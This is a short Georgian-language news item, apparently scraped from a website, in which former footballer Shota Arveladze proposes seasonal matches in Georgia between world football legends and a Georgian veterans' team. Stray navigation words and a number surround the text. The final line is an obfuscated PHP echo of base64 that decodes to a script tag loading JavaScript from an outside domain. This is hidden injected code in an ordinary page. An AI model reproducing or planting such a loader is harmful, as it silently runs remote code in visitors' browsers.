celsiusi
ავერსი საქკაბელი

ვეტერანი ფეხბურთელი შოთა არველაძე საქართველოში მსოფლიო ფეხბურთის ვარსკვლავების მონაწილეობით მატჩების გამართვის ინიციატივით გამოდის. 

როგორც არველაძე Facebook-ზე წერს, დარწმუნებულია, ბიზნესის მხრიდან ამ იდეას მხარდაჭერაც ექნება. 

"გვინდა, ახალი პროექტი წამოვიწყოთ საქართველოში, სეზონზე მინიმუმ ერთხელ ჩავატაროთ მატჩი, მსოფლიო ფეხბურთის ლეგენდების მონაწილეობით. მასპინძელი გუნდი საქართველოს ნაკრები იქნება, რომელშიც ვეტერანი ფეხბურთელები ითამაშებენ. უკვე დაწყებული გვაქვს გუნდებთან მოლაპარაკება და მატჩის ჩატარების თარიღს მოკლე პერიოდში შეგატყობინებთ. რაც მნიშვნელოვანია, უახლოესი მატჩი, ერთმანეთის გამხნევების და მხარდაჭერის იდეის მატარებელი იქნება. ვფიქრობ, რთული პერიოდის დროს, უფრო გვჭირდება მეტი საერთოს გამოძებნა. დარწმუნებული ვარ, ჩვენი იდეის და მიზნის გარშემო არაერთი ადამიანი, კომპანია და ბრენდი გაერთიანდება",-წერს შოთა არველაძე. 

455
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");